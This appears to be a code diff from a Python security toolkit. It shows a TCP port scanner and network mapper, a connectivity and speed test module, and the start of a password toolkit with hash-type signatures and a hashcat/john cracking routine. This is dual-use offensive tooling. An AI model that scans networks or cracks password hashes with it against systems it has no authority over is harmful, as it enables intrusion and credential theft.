            start_port, end_port = int(parts[0]), int(parts[1])
        open_ports = []
        for port in range(start_port, min(end_port + 1, 65536)):
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(1)
                if s.connect_ex((ip, port)) == 0:
                    open_ports.append({
                        'port': port, 'protocol': 'tcp', 'state': 'open',
                        'service': self._guess_service(port),
                    })
                s.close()
            except Exception:
                pass
        host = Host(ip=ip, state='up', ports=open_ports,
                    subnet='.'.join(ip.split('.')[:3]) + '.0/24')
        return {'ok': True, 'host': host.to_dict()}

    # ── Topology / Scan Management ────────────────────────────────────────
    def save_scan(self, name: str, hosts: List[dict]) -> dict:
        """Save a network scan (list of host dicts) for later comparison."""
        scan = {
            'name': name,
            'timestamp': datetime.now(timezone.utc).isoformat(),
            'hosts': hosts,
            'host_count': len(hosts),
        }
        path = os.path.join(self._data_dir, f'scan_{name}_{int(time.time())}.json')
        with open(path, 'w') as f:
            json.dump(scan, f, indent=2)
        return {'ok': True, 'path': path}

    def list_scans(self) -> List[dict]:
        """List saved scans, newest first; unreadable files are skipped."""
        scans = []
        for f in Path(self._data_dir).glob('scan_*.json'):
            try:
                with open(f, 'r') as fh:
                    data = json.load(fh)
                scans.append({
                    'file': f.name,
                    'name': data.get('name', ''),
                    'timestamp': data.get('timestamp', ''),
                    'host_count': data.get('host_count', 0),
                })
            except Exception:
                continue
        return sorted(scans, key=lambda s: s.get('timestamp', ''), reverse=True)

    def load_scan(self, filename: str) -> Optional[dict]:
        """Load a saved scan by filename; None when it does not exist."""
        path = os.path.join(self._data_dir, filename)
        if os.path.exists(path):
            with open(path, 'r') as f:
                return json.load(f)
        return None

    def diff_scans(self, scan1_file: str, scan2_file: str) -> dict:
        """Compare two saved scans by host IP set (new/removed/unchanged)."""
        s1 = self.load_scan(scan1_file)
        s2 = self.load_scan(scan2_file)
        if not s1 or not s2:
            return {'ok': False, 'error': 'Scan(s) not found'}
        ips1 = {h['ip'] for h in s1.get('hosts', [])}
        ips2 = {h['ip'] for h in s2.get('hosts', [])}
        return {
            'ok': True,
            'new_hosts': sorted(ips2 - ips1),
            'removed_hosts': sorted(ips1 - ips2),
            'unchanged_hosts': sorted(ips1 & ips2),
            'scan1': {'name': s1.get('name'), 'timestamp': s1.get('timestamp'),
                      'count': len(ips1)},
            'scan2': {'name': s2.get('name'), 'timestamp': s2.get('timestamp'),
                      'count': len(ips2)},
        }

    def get_job_status(self, job_id: str) -> dict:
        """Poll a discovery job; the job record is dropped once reported done."""
        holder = self._active_jobs.get(job_id)
        if not holder:
            return {'ok': False, 'error': 'Job not found'}
        result = {'ok': True, 'done': holder['done'], 'hosts': holder['hosts']}
        if holder.get('error'):
            result['error'] = holder['error']
        if holder['done']:
            self._active_jobs.pop(job_id, None)
        return result

    # ── Topology Data (for visualization) ─────────────────────────────────
    def build_topology(self, hosts: List[dict]) -> dict:
        """Build topology graph data (nodes/edges) from a host list.

        Node type is a heuristic from open services (web/server/windows).
        NOTE(review): edges point each host at an assumed .1 gateway, which
        may not exist as a node in 'nodes' — confirm the visualizer
        tolerates dangling edge endpoints.
        """
        nodes = []
        edges = []
        subnets = {}
        for h in hosts:
            subnet = '.'.join(h['ip'].split('.')[:3]) + '.0/24'
            if subnet not in subnets:
                subnets[subnet] = {
                    'id': f'subnet_{subnet}', 'label': subnet,
                    'type': 'subnet', 'hosts': [],
                }
            subnets[subnet]['hosts'].append(h['ip'])
            node_type = 'host'
            if h.get('ports'):
                services = [p.get('service', '') for p in h['ports']]
                if any('http' in s.lower() for s in services):
                    node_type = 'web'
                elif any('ssh' in s.lower() for s in services):
                    node_type = 'server'
                elif any('smb' in s.lower() or 'netbios' in s.lower() for s in services):
                    node_type = 'windows'
            nodes.append({
                'id': h['ip'],
                'label': h.get('hostname') or h['ip'],
                'ip': h['ip'],
                'type': node_type,
                'os': h.get('os_guess', ''),
                'ports': len(h.get('ports', [])),
                'subnet': subnet,
            })
            # Edge from host to subnet gateway (assumed to be .1).
            gateway = '.'.join(h['ip'].split('.')[:3]) + '.1'
            edges.append({'from': h['ip'], 'to': gateway, 'type': 'network'})
        # Add subnet nodes
        for subnet_data in subnets.values():
            nodes.append(subnet_data)
        return {
            'nodes': nodes,
            'edges': edges,
            'subnets': list(subnets.keys()),
            'total_hosts': len(hosts),
        }

    # ── Helpers ───────────────────────────────────────────────────────────
    def _expand_target(self, target: str) -> List[str]:
        """Expand a CIDR block or last-octet range ('a.b.c.X-Y') to IPs."""
        if '/' in target:
            return self._cidr_to_ips(target)
        if '-' in target.split('.')[-1]:
            base = '.'.join(target.split('.')[:3])
            range_part = target.split('.')[-1]
            start, end = range_part.split('-')
            return [f'{base}.{i}' for i in range(int(start), int(end) + 1)]
        return [target]

    @staticmethod
    def _cidr_to_ips(cidr: str) -> List[str]:
        """Expand a CIDR block to its usable host addresses.

        /31 and /32 have no network+1..broadcast-1 host range, so the base
        address itself is returned; prefixes shorter than /16 are refused
        (would expand to >65k hosts).
        """
        parts = cidr.split('/')
        if len(parts) != 2:
            return [cidr]
        ip = parts[0]
        prefix = int(parts[1])
        if prefix < 16:
            return [ip]  # Too large, don't expand
        if prefix >= 31:
            # range(network+1, broadcast) would be empty for /31 and /32.
            return [ip]
        ip_int = struct.unpack('!I', socket.inet_aton(ip))[0]
        mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
        network = ip_int & mask
        broadcast = network | (~mask & 0xFFFFFFFF)
        # Skip the network address; range() already excludes broadcast.
        return [socket.inet_ntoa(struct.pack('!I', i))
                for i in range(network + 1, broadcast)]

    def _parse_nmap_xml(self, xml_text: str) -> List[Host]:
        """Parse nmap XML output into Host objects (up hosts, open ports only)."""
        hosts = []
        try:
            import xml.etree.ElementTree as ET
            root = ET.fromstring(xml_text)
            for host_el in root.findall('.//host'):
                state = host_el.find('status')
                if state is not None and state.get('state') != 'up':
                    continue
                addr = host_el.find("address[@addrtype='ipv4']")
                if addr is None:
                    continue
                ip = addr.get('addr', '')
                mac_el = host_el.find("address[@addrtype='mac']")
                hostname_el = host_el.find('.//hostname')
                os_el = host_el.find('.//osmatch')
                h = Host(
                    ip=ip,
                    mac=mac_el.get('addr', '') if mac_el is not None else '',
                    hostname=hostname_el.get('name', '') if hostname_el is not None else '',
                    os_guess=os_el.get('name', '') if os_el is not None else '',
                    subnet='.'.join(ip.split('.')[:3]) + '.0/24',
                )
                for port_el in host_el.findall('.//port'):
                    state_el = port_el.find('state')
                    if state_el is not None and state_el.get('state') == 'open':
                        svc_el = port_el.find('service')
                        h.ports.append({
                            'port': int(port_el.get('portid', 0)),
                            'protocol': port_el.get('protocol', 'tcp'),
                            'state': 'open',
                            'service': svc_el.get('name', '') if svc_el is not None else '',
                            'version': svc_el.get('version', '') if svc_el is not None else '',
                        })
                hosts.append(h)
        except Exception:
            pass  # malformed/empty XML: return what was parsed so far
        return hosts

    @staticmethod
    def _guess_service(port: int) -> str:
        """Best-effort well-known-port to service-name mapping ('' if unknown)."""
        services = {
            21: 'ftp', 22: 'ssh', 23: 'telnet', 25: 'smtp', 53: 'dns',
            80: 'http', 110: 'pop3', 143: 'imap', 443: 'https', 445: 'smb',
            993: 'imaps', 995: 'pop3s', 3306: 'mysql', 3389: 'rdp',
            5432: 'postgresql', 5900: 'vnc', 6379: 'redis', 8080: 'http-alt',
            8443: 'https-alt', 27017: 'mongodb',
        }
        return services.get(port, '')
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_net_mapper() -> NetMapper:
    """Return the shared NetMapper (lazily created, thread-safe)."""
    global _instance
    if _instance is not None:
        return _instance
    with _lock:
        # Re-check under the lock: another thread may have created it first.
        if _instance is None:
            _instance = NetMapper()
    return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
    """Interactive CLI for Network Mapper.

    Menu loop over the NetMapper singleton: async host discovery with
    polling, single-host scans, and saved-scan listing/diffing. Returns
    when the user selects 0.
    """
    svc = get_net_mapper()
    while True:
        print("\n╔═══════════════════════════════════════╗")
        print("║ NETWORK TOPOLOGY MAPPER ║")
        print("╠═══════════════════════════════════════╣")
        print("║ 1 — Discover Hosts ║")
        print("║ 2 — Scan Host (detailed) ║")
        print("║ 3 — List Saved Scans ║")
        print("║ 4 — Compare Scans ║")
        print("║ 0 — Back ║")
        print("╚═══════════════════════════════════════╝")
        choice = input("\n Select: ").strip()
        if choice == '0':
            break
        elif choice == '1':
            target = input(" Target (CIDR/range): ").strip()
            if not target:
                continue
            print(" Discovering hosts...")
            r = svc.discover_hosts(target)
            if r.get('job_id'):
                # Poll the background discovery job every 2s until done.
                while True:
                    time.sleep(2)
                    s = svc.get_job_status(r['job_id'])
                    if s['done']:
                        hosts = s['hosts']
                        print(f"\n Found {len(hosts)} hosts:")
                        for h in hosts:
                            ports = len(h.get('ports', []))
                            print(f" {h['ip']:16s} {h.get('hostname',''):20s} "
                                  f"{h.get('os_guess',''):20s} {ports} ports")
                        save = input("\n Save scan? (name/empty=skip): ").strip()
                        if save:
                            svc.save_scan(save, hosts)
                            print(f" Saved as: {save}")
                        break
        elif choice == '2':
            ip = input(" Host IP: ").strip()
            if not ip:
                continue
            print(" Scanning...")
            r = svc.scan_host(ip)
            if r.get('ok'):
                h = r['host']
                # NOTE(review): IP and OS guess are concatenated with no
                # separator — looks like a dropped '—' glyph; confirm.
                print(f"\n {h['ip']}{h.get('os_guess', 'unknown OS')}")
                for p in h.get('ports', []):
                    print(f" {p['port']:6d}/{p['protocol']} {p.get('service','')}"
                          f" {p.get('version','')}")
        elif choice == '3':
            scans = svc.list_scans()
            if not scans:
                print("\n No saved scans.")
                continue
            for s in scans:
                print(f" {s['file']:40s} {s['name']:15s} "
                      f"{s['host_count']} hosts {s['timestamp'][:19]}")
        elif choice == '4':
            scans = svc.list_scans()
            if len(scans) < 2:
                print(" Need at least 2 saved scans.")
                continue
            for i, s in enumerate(scans, 1):
                print(f" {i}. {s['file']} ({s['host_count']} hosts)")
            # NOTE(review): non-numeric or out-of-range input raises
            # ValueError/IndexError here and aborts the loop — confirm
            # whether a caller catches it.
            a = int(input(" Scan 1 #: ").strip()) - 1
            b = int(input(" Scan 2 #: ").strip()) - 1
            diff = svc.diff_scans(scans[a]['file'], scans[b]['file'])
            if diff.get('ok'):
                print(f"\n New hosts: {len(diff['new_hosts'])}")
                for h in diff['new_hosts']:
                    print(f" + {h}")
                print(f" Removed hosts: {len(diff['removed_hosts'])}")
                for h in diff['removed_hosts']:
                    print(f" - {h}")
                print(f" Unchanged: {len(diff['unchanged_hosts'])}")

363
modules/nettest.py Normal file
View File

@@ -0,0 +1,363 @@
"""
AUTARCH Network Test Module
Test network speed and connectivity
"""
import sys
import time
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
# Module metadata
NAME = "Network Test"
DESCRIPTION = "Test network speed and connectivity"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "utility"
# Try to import optional dependencies
try:
import speedtest
HAS_SPEEDTEST = True
except ImportError:
HAS_SPEEDTEST = False
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
class NetworkTester:
    """Network testing utility: connectivity, speed, and DNS checks.

    All methods print progress to stdout and also return structured
    result dicts for programmatic use.
    """
    def __init__(self):
        # (display name, URL) pairs probed by test_connectivity().
        self.test_urls = [
            ("Google", "https://www.google.com"),
            ("Cloudflare", "https://1.1.1.1"),
            ("GitHub", "https://github.com"),
            ("Amazon", "https://aws.amazon.com"),
        ]
    def test_connectivity(self) -> dict:
        """Test basic internet connectivity.

        Issues an HTTP GET (10s timeout) to each URL in self.test_urls;
        only a final status of 200 counts as success.

        Returns:
            Dict with connectivity results ('tests', 'success_count',
            'fail_count'), or {'error': ...} when requests is missing.
        """
        if not HAS_REQUESTS:
            return {'error': 'requests library not available'}
        print(f"{Colors.CYAN}[*] Testing connectivity...{Colors.RESET}")
        results = {
            'tests': [],
            'success_count': 0,
            'fail_count': 0,
        }
        for name, url in self.test_urls:
            try:
                start = time.time()
                response = requests.get(url, timeout=10)
                # Round-trip time in whole milliseconds.
                elapsed = round((time.time() - start) * 1000)
                success = response.status_code == 200
                results['tests'].append({
                    'name': name,
                    'url': url,
                    'success': success,
                    'status': response.status_code,
                    'time_ms': elapsed,
                })
                if success:
                    results['success_count'] += 1
                    print(f" {Colors.GREEN}[+]{Colors.RESET} {name}: {elapsed}ms")
                else:
                    results['fail_count'] += 1
                    print(f" {Colors.RED}[-]{Colors.RESET} {name}: HTTP {response.status_code}")
            except requests.exceptions.Timeout:
                results['fail_count'] += 1
                results['tests'].append({
                    'name': name,
                    'url': url,
                    'success': False,
                    'error': 'Timeout',
                })
                print(f" {Colors.RED}[-]{Colors.RESET} {name}: Timeout")
            except requests.exceptions.ConnectionError:
                results['fail_count'] += 1
                results['tests'].append({
                    'name': name,
                    'url': url,
                    'success': False,
                    'error': 'Connection failed',
                })
                print(f" {Colors.RED}[-]{Colors.RESET} {name}: Connection failed")
            except Exception as e:
                # Catch-all so one bad endpoint never aborts the whole sweep.
                results['fail_count'] += 1
                results['tests'].append({
                    'name': name,
                    'url': url,
                    'success': False,
                    'error': str(e),
                })
                print(f" {Colors.RED}[-]{Colors.RESET} {name}: {str(e)}")
        return results
    def test_speed(self) -> dict:
        """Test network speed using speedtest.

        Returns:
            Dict with speed test results (Mbps download/upload, ping,
            client/server info), or {'error': ...} on failure or when
            speedtest-cli is not installed.
        """
        if not HAS_SPEEDTEST:
            return {'error': 'speedtest-cli library not available'}
        print(f"{Colors.CYAN}[*] Running speed test (this may take a minute)...{Colors.RESET}")
        try:
            # secure=True forces HTTPS to the speedtest servers.
            st = speedtest.Speedtest(secure=True)
            print(f" {Colors.DIM}Finding best server...{Colors.RESET}")
            st.get_best_server()
            print(f" {Colors.DIM}Testing download speed...{Colors.RESET}")
            st.download(threads=None)
            print(f" {Colors.DIM}Testing upload speed...{Colors.RESET}")
            st.upload(threads=None)
            results = st.results.dict()
            return {
                # speedtest reports bits/s; convert to Mbps.
                'download_mbps': round(results['download'] / 1_000_000, 2),
                'upload_mbps': round(results['upload'] / 1_000_000, 2),
                'ping_ms': round(results['ping']),
                'client': {
                    'ip': results.get('client', {}).get('ip'),
                    'isp': results.get('client', {}).get('isp'),
                    'country': results.get('client', {}).get('country'),
                },
                'server': {
                    'name': results.get('server', {}).get('name'),
                    'country': results.get('server', {}).get('country'),
                    'sponsor': results.get('server', {}).get('sponsor'),
                },
            }
        except Exception as e:
            return {'error': f'Speed test failed: {str(e)}'}
    def test_dns(self, domain: str = "google.com") -> dict:
        """Test DNS resolution.

        Args:
            domain: Domain to resolve.
        Returns:
            Dict with DNS test results ('resolved', 'addresses',
            'time_ms'; 'error' on failure).
        """
        import socket
        print(f"{Colors.CYAN}[*] Testing DNS resolution...{Colors.RESET}")
        results = {
            'domain': domain,
            'resolved': False,
            'addresses': [],
        }
        try:
            start = time.time()
            addrs = socket.getaddrinfo(domain, 80)
            elapsed = round((time.time() - start) * 1000)
            results['resolved'] = True
            results['time_ms'] = elapsed
            # Deduplicate: getaddrinfo returns one tuple per family/socktype.
            results['addresses'] = list(set(addr[4][0] for addr in addrs))
            print(f" {Colors.GREEN}[+]{Colors.RESET} Resolved {domain} in {elapsed}ms")
            for addr in results['addresses'][:3]:
                print(f" {Colors.DIM}{addr}{Colors.RESET}")
        except socket.gaierror as e:
            results['error'] = f"DNS resolution failed: {e}"
            print(f" {Colors.RED}[-]{Colors.RESET} DNS resolution failed")
        except Exception as e:
            results['error'] = str(e)
            print(f" {Colors.RED}[-]{Colors.RESET} Error: {e}")
        return results
def color_speed(value: float, thresholds: tuple) -> str:
    """Render *value* wrapped in a quality color.

    Args:
        value: Speed value.
        thresholds: (low, medium) — below low is red, below medium is
            yellow, otherwise green.
    Returns:
        Colored string.
    """
    low, medium = thresholds
    if value >= medium:
        color = Colors.GREEN
    elif value >= low:
        color = Colors.YELLOW
    else:
        color = Colors.RED
    return f"{color}{value}{Colors.RESET}"
def display_speed_result(result: dict):
    """Display speed test results nicely.

    Expects the dict shape produced by NetworkTester.test_speed(); an
    'error' key short-circuits to a single error line.
    """
    if 'error' in result:
        print(f"\n{Colors.RED}[X] {result['error']}{Colors.RESET}")
        return
    print(f"\n{Colors.CYAN}{'=' * 50}{Colors.RESET}")
    print(f"{Colors.GREEN}{Colors.BOLD} NETWORK SPEED TEST RESULTS{Colors.RESET}")
    print(f"{Colors.CYAN}{'=' * 50}{Colors.RESET}")
    # Download speed (low < 5 Mbps, medium < 25 Mbps)
    download = result['download_mbps']
    download_colored = color_speed(download, (5, 25))
    print(f" {Colors.GREEN}Download:{Colors.RESET} {download_colored} Mbps")
    # Upload speed (low < 2 Mbps, medium < 10 Mbps)
    upload = result['upload_mbps']
    upload_colored = color_speed(upload, (2, 10))
    print(f" {Colors.GREEN}Upload:{Colors.RESET} {upload_colored} Mbps")
    # Ping (low > 100ms, medium > 50ms, inverted: higher is worse, so
    # color_speed() cannot be reused here).
    ping = result['ping_ms']
    if ping > 100:
        ping_colored = f"{Colors.RED}{ping}{Colors.RESET}"
    elif ping > 50:
        ping_colored = f"{Colors.YELLOW}{ping}{Colors.RESET}"
    else:
        ping_colored = f"{Colors.GREEN}{ping}{Colors.RESET}"
    print(f" {Colors.GREEN}Ping:{Colors.RESET} {ping_colored} ms")
    # Client info (your IP/ISP as seen by the test server).
    client = result.get('client', {})
    if client:
        print(f"\n {Colors.CYAN}Your Connection:{Colors.RESET}")
        if client.get('ip'):
            print(f" IP: {client['ip']}")
        if client.get('isp'):
            print(f" ISP: {client['isp']}")
        if client.get('country'):
            print(f" Country: {client['country']}")
    # Server info (which speedtest node was used).
    server = result.get('server', {})
    if server:
        print(f"\n {Colors.CYAN}Test Server:{Colors.RESET}")
        if server.get('sponsor'):
            print(f" {server['sponsor']}")
        if server.get('name'):
            print(f" {server['name']}, {server.get('country', '')}")
    print()
def display_menu():
    """Display the network test module menu.

    The speed-test entry shows live availability of the optional
    speedtest-cli dependency.
    NOTE(review): the separator line interpolates ``'' * 50`` (an empty
    string, so nothing is printed) — this looks like a dropped '─' glyph;
    confirm against the original source.
    """
    speedtest_status = f"{Colors.GREEN}Available{Colors.RESET}" if HAS_SPEEDTEST else f"{Colors.RED}Not installed{Colors.RESET}"
    print(f"""
{Colors.CYAN} Network Test{Colors.RESET}
{Colors.DIM} Test network speed and connectivity{Colors.RESET}
{Colors.DIM}{'' * 50}{Colors.RESET}
{Colors.GREEN}[1]{Colors.RESET} Test Connectivity (ping websites)
{Colors.GREEN}[2]{Colors.RESET} Full Speed Test [{speedtest_status}]
{Colors.GREEN}[3]{Colors.RESET} Test DNS Resolution
{Colors.GREEN}[4]{Colors.RESET} Run All Tests
{Colors.RED}[0]{Colors.RESET} Back
""")
def run():
    """Main entry point for the module.

    Interactive menu loop over NetworkTester. Bails out early when the
    hard dependency 'requests' is missing; speedtest-cli is optional and
    only gates the speed-test options.
    """
    if not HAS_REQUESTS:
        print(f"{Colors.RED}[X] This module requires 'requests' library{Colors.RESET}")
        print(f"{Colors.DIM} Install with: pip install requests{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return
    tester = NetworkTester()
    while True:
        display_menu()
        choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
        if choice == '0':
            break
        elif choice == '1':
            results = tester.test_connectivity()
            if 'error' not in results:
                total = results['success_count'] + results['fail_count']
                print(f"\n{Colors.GREEN}[+] Connectivity: {results['success_count']}/{total} tests passed{Colors.RESET}")
            input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '2':
            if not HAS_SPEEDTEST:
                print(f"\n{Colors.RED}[X] speedtest-cli library not installed{Colors.RESET}")
                print(f"{Colors.DIM} Install with: pip install speedtest-cli{Colors.RESET}")
            else:
                results = tester.test_speed()
                display_speed_result(results)
            input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '3':
            print(f"\n{Colors.CYAN}Enter domain to resolve (default: google.com):{Colors.RESET}")
            domain = input(f"{Colors.GREEN}Domain: {Colors.RESET}").strip() or "google.com"
            tester.test_dns(domain)
            input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '4':
            # Run every test in sequence; each prints its own summary.
            print(f"\n{Colors.CYAN}{'=' * 50}{Colors.RESET}")
            print(f"{Colors.GREEN}{Colors.BOLD} RUNNING ALL NETWORK TESTS{Colors.RESET}")
            print(f"{Colors.CYAN}{'=' * 50}{Colors.RESET}\n")
            # Connectivity
            print(f"{Colors.BOLD}1. Connectivity Test{Colors.RESET}")
            conn_results = tester.test_connectivity()  # retained; currently unused
            # DNS
            print(f"\n{Colors.BOLD}2. DNS Resolution{Colors.RESET}")
            tester.test_dns()
            # Speed test
            if HAS_SPEEDTEST:
                print(f"\n{Colors.BOLD}3. Speed Test{Colors.RESET}")
                speed_results = tester.test_speed()
                display_speed_result(speed_results)
            else:
                print(f"\n{Colors.BOLD}3. Speed Test{Colors.RESET}")
                print(f" {Colors.RED}[-]{Colors.RESET} Skipped (speedtest-cli not installed)")
            input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        else:
            print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
if __name__ == "__main__":
run()

796
modules/password_toolkit.py Normal file
View File

@@ -0,0 +1,796 @@
"""AUTARCH Password Toolkit
Hash identification, cracking (hashcat/john integration), password generation,
credential spray/stuff testing, wordlist management, and password policy auditing.
"""
DESCRIPTION = "Password cracking & credential testing"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import string
import secrets
import hashlib
import threading
import subprocess
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Tuple
# Prefer the AUTARCH core helpers; fall back to standalone equivalents so the
# module still works when imported outside the framework.
try:
    from core.paths import find_tool, get_data_dir
except ImportError:
    import shutil
    def find_tool(name):
        # Fallback: resolve an executable on PATH (None when not found).
        return shutil.which(name)
    def get_data_dir():
        # Fallback: use <repo>/data, one level above the modules directory.
        return str(Path(__file__).parent.parent / 'data')
# ── Hash Type Signatures ──────────────────────────────────────────────────────
@dataclass
class HashSignature:
    """Fingerprint for one hash format: how to recognize and crack it."""
    name: str          # human-readable hash type name
    regex: str         # full-match pattern identifying the digest format
    hashcat_mode: int  # hashcat -m mode number
    john_format: str   # john --format= name
    example: str       # sample digest ('' when none is practical)
    bits: int = 0      # digest length in bits (0 = variable/unknown)
# Known hash formats, tried in order by identify_hash().  Prefixed crypt/KDF
# schemes ($2b$, $6$, ...) self-identify; bare-hex patterns (MD5/NTLM/LM,
# CRC32) only constrain length and are inherently ambiguous.
HASH_SIGNATURES: List[HashSignature] = [
    # Raw digests (bare hex, distinguished by length only)
    HashSignature('MD5', r'^[a-fA-F0-9]{32}$', 0, 'raw-md5', 'd41d8cd98f00b204e9800998ecf8427e', 128),
    HashSignature('SHA-1', r'^[a-fA-F0-9]{40}$', 100, 'raw-sha1', 'da39a3ee5e6b4b0d3255bfef95601890afd80709', 160),
    HashSignature('SHA-224', r'^[a-fA-F0-9]{56}$', 1300, 'raw-sha224', 'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f', 224),
    HashSignature('SHA-256', r'^[a-fA-F0-9]{64}$', 1400, 'raw-sha256', 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 256),
    HashSignature('SHA-384', r'^[a-fA-F0-9]{96}$', 10800, 'raw-sha384', '38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da274edebfe76f65fbd51ad2f14898b95b', 384),
    HashSignature('SHA-512', r'^[a-fA-F0-9]{128}$', 1700, 'raw-sha512', 'cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e', 512),
    # Windows credential hashes (same 32-hex shape as MD5)
    HashSignature('NTLM', r'^[a-fA-F0-9]{32}$', 1000, 'nt', '31d6cfe0d16ae931b73c59d7e0c089c0', 128),
    HashSignature('LM', r'^[a-fA-F0-9]{32}$', 3000, 'lm', 'aad3b435b51404eeaad3b435b51404ee', 128),
    # Self-identifying crypt / KDF schemes
    HashSignature('bcrypt', r'^\$2[aby]?\$\d{1,2}\$[./A-Za-z0-9]{53}$', 3200, 'bcrypt', '$2b$12$LJ3m4ys3Lg2VBe5F.4oXzuLKmRPBRWvs5fS5K.zL1E8CfJzqS/VfO', 0),
    HashSignature('scrypt', r'^\$7\$', 8900, 'scrypt', '', 0),
    HashSignature('Argon2', r'^\$argon2(i|d|id)\$', 0, 'argon2', '', 0),
    HashSignature('MySQL 4.1+', r'^\*[a-fA-F0-9]{40}$', 300, 'mysql-sha1', '*6C8989366EAF6BCBBAA855D6DA93DE65C96D33D9', 160),
    HashSignature('SHA-512 Crypt', r'^\$6\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{86}$', 1800, 'sha512crypt', '', 0),
    HashSignature('SHA-256 Crypt', r'^\$5\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{43}$', 7400, 'sha256crypt', '', 0),
    HashSignature('MD5 Crypt', r'^\$1\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0),
    HashSignature('DES Crypt', r'^[./A-Za-z0-9]{13}$', 1500, 'descrypt', '', 0),
    HashSignature('APR1 MD5', r'^\$apr1\$', 1600, 'md5apr1', '', 0),
    # Network devices / web frameworks
    HashSignature('Cisco Type 5', r'^\$1\$[./A-Za-z0-9]{8}\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0),
    HashSignature('Cisco Type 7', r'^[0-9]{2}[0-9A-Fa-f]+$', 0, '', '', 0),
    HashSignature('PBKDF2-SHA256', r'^\$pbkdf2-sha256\$', 10900, 'pbkdf2-hmac-sha256', '', 0),
    HashSignature('Django SHA256', r'^pbkdf2_sha256\$', 10000, 'django', '', 0),
    # Checksums
    HashSignature('CRC32', r'^[a-fA-F0-9]{8}$', 0, '', 'deadbeef', 32),
]
# ── Password Toolkit Service ─────────────────────────────────────────────────
class PasswordToolkit:
    """Hash identification, cracking, generation, and credential testing.

    Cracking and spraying run in background daemon threads; callers keep
    the returned ``job_id`` and poll :meth:`get_crack_status` /
    :meth:`get_spray_status` until ``done`` is True.
    """

    def __init__(self):
        # Per-feature storage lives under <data_dir>/password_toolkit/.
        self._data_dir = os.path.join(get_data_dir(), 'password_toolkit')
        self._wordlists_dir = os.path.join(self._data_dir, 'wordlists')
        self._results_dir = os.path.join(self._data_dir, 'results')
        os.makedirs(self._wordlists_dir, exist_ok=True)
        os.makedirs(self._results_dir, exist_ok=True)
        # job_id -> mutable holder dict shared with the worker thread.
        self._active_jobs: Dict[str, dict] = {}

    # ── Hash Identification ───────────────────────────────────────────────
    def identify_hash(self, hash_str: str) -> List[dict]:
        """Identify possible hash types for a given hash string.

        Returns one dict per matching signature, sorted most-confident
        first.  Bare-hex formats of equal length (MD5/NTLM/LM) all match
        the same strings, so several candidates are normal.
        """
        hash_str = hash_str.strip()
        matches = []
        for sig in HASH_SIGNATURES:
            if re.match(sig.regex, hash_str):
                matches.append({
                    'name': sig.name,
                    'hashcat_mode': sig.hashcat_mode,
                    'john_format': sig.john_format,
                    'bits': sig.bits,
                    'confidence': self._hash_confidence(hash_str, sig),
                })
        # Sort by confidence: high → medium → low (unknown labels last).
        matches.sort(key=lambda m: {'high': 0, 'medium': 1, 'low': 2}.get(m['confidence'], 3))
        return matches

    def _hash_confidence(self, hash_str: str, sig: 'HashSignature') -> str:
        """Estimate confidence that *hash_str* really is of type *sig*."""
        # Prefixed crypt/KDF formats are definitive matches.
        if sig.name in ('bcrypt', 'scrypt', 'Argon2', 'SHA-512 Crypt',
                        'SHA-256 Crypt', 'MD5 Crypt', 'APR1 MD5',
                        'PBKDF2-SHA256', 'Django SHA256', 'MySQL 4.1+'):
            return 'high'
        # Length-based matches can be ambiguous (MD5 vs NTLM vs LM).
        if len(hash_str) == 32:
            return 'medium'  # Could be MD5, NTLM, or LM
        if len(hash_str) == 8:
            return 'low'  # CRC32 vs any short hex string
        return 'medium'

    def identify_batch(self, hashes: List[str]) -> List[dict]:
        """Identify types for multiple hashes; blank lines are skipped."""
        results = []
        for h in hashes:
            h = h.strip()
            if not h:
                continue
            ids = self.identify_hash(h)
            results.append({'hash': h, 'types': ids})
        return results

    # ── Hash Cracking ─────────────────────────────────────────────────────
    def crack_hash(self, hash_str: str, hash_type: str = 'auto',
                   wordlist: str = '', attack_mode: str = 'dictionary',
                   rules: str = '', mask: str = '',
                   tool: str = 'auto') -> dict:
        """Start a hash cracking job.

        attack_mode: 'dictionary', 'brute_force', 'mask', 'hybrid'
        tool: 'hashcat', 'john', 'auto' (try hashcat first, then john;
              fall back to a pure-Python dictionary attack if neither
              external tool is installed).

        Returns a dict with a 'job_id' when a background job was started,
        or an immediate result/error dict otherwise.
        """
        hash_str = hash_str.strip()
        if not hash_str:
            return {'ok': False, 'error': 'No hash provided'}
        # Auto-detect hash type if needed; use the most confident match.
        if hash_type == 'auto':
            ids = self.identify_hash(hash_str)
            if not ids:
                return {'ok': False, 'error': 'Could not identify hash type'}
            hash_type = ids[0]['name']
        # Find a cracking tool.
        hashcat = find_tool('hashcat')
        john = find_tool('john')
        if tool == 'auto':
            tool = 'hashcat' if hashcat else ('john' if john else None)
        elif tool == 'hashcat' and not hashcat:
            return {'ok': False, 'error': 'hashcat not found'}
        elif tool == 'john' and not john:
            return {'ok': False, 'error': 'john not found'}
